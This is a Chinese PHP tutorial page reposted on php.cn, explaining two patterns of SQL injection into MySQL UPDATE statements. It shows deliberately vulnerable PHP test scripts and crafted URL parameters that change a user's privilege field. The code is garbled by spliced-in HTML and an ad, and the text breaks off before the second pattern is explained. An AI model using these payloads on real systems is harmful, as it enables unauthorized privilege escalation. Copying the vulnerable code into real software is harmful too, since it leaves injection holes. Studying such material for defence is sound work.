讲师中心 微信公众号
首页
文章
后端开发 web前端 数据库 开发工具 php框架 常见问题 科技 Java 系统教程 电脑教程 硬件教程 手机教程 软件教程 游戏教程 自媒体 新闻
专题
后端开发 web前端 数据库 开发工具 php框架 科技 Java 系统教程 电脑教程 硬件教程 手机教程 软件教程 游戏教程 新闻
AI工具
AI 聊天问答 Agent智能体 AI 文本写作 AI 绘画作图 AI 设计工具 AI 视频创作 AI 音频制作 AI 办公学习 AI 编程开发 Prompt指令
学习
大前端 后端开发 数据库 移动端 运维开发 计算机基础
编程手册
大前端 后端开发 数据库 移动端 运维开发 计算机基础
下载
js特效 网站源码 工具下载 类库下载 网站素材 学习资源 插件扩展 手机游戏
最近更新
首页 > php教程 > php手册 > 正文

UPDATE注射(mysql+php)的两个模式

php中文网
发布: 2016-06-13 10:33:25
原创
1106人浏览过

一.测试环境:

  OS: Windowsxp sp2

  php: php 4.3.10 (

  mysql 4.1.9

  apache 1.3.33 

  二.测试数据库结构:

-----start---

-- 数据库: `test`

-- 

-- --------------------------------------------------------

-- 

-- 表的结构 `userinfo`

-- 

CREATE TABLE `userinfo` (

`groudid` varchar(12) NOT NULL default ’1’,

`user` varchar(12) NOT NULL default ’heige’,

`pass` varchar(122) NOT NULL default ’123456’

) ENGINE=MyISAM DEFAULT CHARSET=latin1;

-- 

-- 导出表中的数据 `userinfo`

-- 

INSERT INTO `userinfo` VALUES (’2’, ’heige’, ’123456’);

------end-------

三.测试模式:

  1,变量没有带’’或""[MOD1]

@@######@@


  脚本里只是修改user=’heige’的pass,如果groudid表示用户的权限等级,我们的目的就是通过构造$p 来达

  到修改groupid的目的:

  那么我们提交:http://127.0.0.1/test1.php?p=123456,groudid=1

  在mysql里查询:
mysql> select * from userinfo;

+---------+-------+--------+

| groudid | user  | pass   |

+---------+-------+--------+

| 1       | heige | 123456 |

+---------+-------+--------+

1 row in set (0.01 sec)

用户heige的groudid又2改为1了 :)

  所以我们可以得到没有’’或"" update的注射是可以成功的,这个就是我们的模式1。

  2,变量带’’或""[MOD2]


//test2.php

$servername = "localhost";

$dbusername = "root";

$dbpassword = "";

$dbname = "test";

mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败");

$sql = "update userinfo set pass=’$p’ where user=’heige’";//
$result = mysql_db_query($dbname, $sql);

$userinfo = mysql_fetch_array($result);

echo "

sql query:$sql

";

?>

  为了关闭’我们构造$p应该为123456’,groudid=’2 提交:

  http://127.0.0.1/test2.php?p=123456’,groudid=’1 在gpc=on的情况下’变成了’

  提交的语句变成:SQL Query:update userinfo set pass=’123456’,groudid=’1’ where user=’heige’

mysql查询:

mysql> select * from userinfo;

+---------+-------+--------------------+

| groudid | user  | pass               |

+---------+-------+--------------------+

| 2       | heige | 123456’,groudid=’1 |

+---------+-------+--------------------+

1 row in set (0.00 sec)


  groudid并没有被修改。那么在变量被’’或""时 就完全没有被注射呢?不是 下面我们看模式2:

//test3.php Mod2

$servername = "localhost";

$dbusername = "root";

$dbpassword = ""; 

<!--p <--><br/>
            //test1.php Mod1 <br/>
            <br/>
            $servername = "localhost"; <br/>
            <br/>
            $dbusername = "root"; <br/>
            <br/>
            $dbpassword = ""; <br/>
            <br/>
            $dbname = "test"; <br/>
            <br/>
            mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败"); <br/>
            <br/>
            $sql = "update userinfo set pass=$p where user=&rsquo;heige&rsquo;";//<--$P没有使用单引号 <br/>
            <br/>
            $result = mysql_db_query($dbname, $sql); <br/>
            <br/>
            $userinfo = mysql_fetch_array($result); <br/>
            <br/>
            echo "
            <p>sql query:$sql</p>
                    <div class="aritcle_card">
                        <a class="aritcle_card_img" href="/xiazai/code/8596">
                            <img src="https://img.php.cn/upload/webcode/000/000/001/174962880424048.png" alt="PHP轻论坛">
                        </a>
                        <div class="aritcle_card_info">
                            <a href="/xiazai/code/8596">PHP轻论坛</a>
                            <p>简介PHP轻论坛是一个简单易用的PHP论坛程序,适合小型社区和个人网站使用。v3.0版本是完全重构的版本,解决了之前版本中的所有已知问题,特别是MySQL保留字冲突问题。主要特点• 简单易用:简洁的界面,易于安装和使用• 响应式设计:适配各种设备,包括手机和平板• 安全可靠:避免使用MySQL保留字,防止SQL注入• 功能完善:支持分类、主题、回复、用户管理等基本功能• 易于扩展:模块化设计,便于</p>
                            <div class="">
                                <img src="/static/images/card_xiazai.png" alt="PHP轻论坛">
                                <span>26</span>
                            </div>
                        </div>
                        <a href="/xiazai/code/8596" class="aritcle_card_btn">
                            <span>查看详情</span>
                            <img src="/static/images/cardxiayige-3.png" alt="PHP轻论坛">
                        </a>
                    </div>
                
            <p>"; <br/>
            <br/>
            ?></p>
登录后复制
相关标签:
php
PHP速学教程(入门到精通)
PHP速学教程(入门到精通)

PHP怎么学习?PHP怎么入门?PHP在哪学?PHP怎么学才快?不用担心,这里为大家提供了PHP速学教程(入门到精通),有需要的小伙伴保存下载就能学习啦!

下载
来源:php中文网
收藏 点赞
上一篇:Linux下PHP连接SQL Server的办法 下一篇:PHP程序中的常见漏洞详解
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系admin@php.cn
最新问题
在python的开发过程中如何进行单链表的实现(代码) 本文介绍了如何实现单链表,希望大家耐心学习。
2018-09-15 09:33:11
11059
如何理解Elasticsearch单机双节点集群部署 这篇文章,我们还是做些基础的学习,在Elasticsearch如何进行CRUD。
2018-09-14 16:03:42
12926
如何理解关于memset函数 本文介绍了如何理解关于memset函数 ,希望大家耐心学习。
2018-09-14 15:27:49
5421
启动页进入时有短暂黑屏或白屏现象的终极解决方案 irontec 推出了一个开源项目 PHP for Android (PFA),把php带到Android平台上。现在我们来介绍一下。
2018-09-14 15:13:15
5495
如何把WebStorm上传代码到Git ​我是一名前端开发工程师。大概1年前开始使用webstorm这个编辑器,今天向大家介绍一下这个软件。
2018-09-14 14:49:20
6315
分布式系统唯一ID生成方案汇总 系统唯一ID是我们在设计一个系统的时候常常会遇见的问题,也常常为这个问题而纠结。生成ID的方法有很多,适应不同的场景、需求以及性能要求。所以有些比较复杂的系统会有多个ID生成的策略。下面就介绍一些常见的ID生成策略。
2018-09-14 13:39:20
5965
如何在远程过程调用(RPC) HTTP请求式 做过Socket编程的人都知道,当我们设计一个通信协议时,“消息头/消息体”的分割方式是很常用的,消息头告诉对方这个消息是干什么的,消息体告诉对方怎么干。
2018-09-14 11:44:18
4522
Visual Studio Code中安装go语言插件 PHP入门之语句,包括if语句、while语句、go语句,供PHP初学者参考。
2018-09-14 11:38:24
5353
详解Sublime Text 2 代码编辑器或者文本编辑器,对于程序员来说,就像剑与战士一样,谁都想拥有一把可以随心驾驭且锋利无比的宝剑,而每一位程序员,同样会去追求最适合自己的强大、灵活的编辑器,相信你和我一样,都不会例外。我用过的编辑器不少,真不少~ 但却没有哪款让我特别心仪的,直到我遇到了 Sublime Text 2 !如果说“神器”是我能给予一款软件最高的评价,那么我很乐意为它封上这么一个称号。它小巧绿色且速度非常快
2018-06-11 16:24:34
2917
用CSS实现的一张图完成的按钮实例 用CSS实现的一张图完成的导航条ul,li{ list-style:non...
2018-05-09 20:23:31
2458
相关专题
更多>
热门推荐
开源免费商场系统广告
热门教程
更多>
相关推荐
热门推荐
最新课程
最新下载
更多>
网站特效
网站源码
网站素材
前端模板
关于我们 免责申明 举报中心 意见反馈 讲师合作 广告合作 最新更新
php中文网:公益在线php培训,帮助PHP学习者快速成长!
关注服务号 技术交流群
PHP中文网订阅号
每天精选资源文章推送

Copyright 2014-2025 https://www.php.cn/ All Rights Reserved | php.cn | 湘ICP备2023035733号

  • PHP学习

  • 技术支持

  • 返回顶部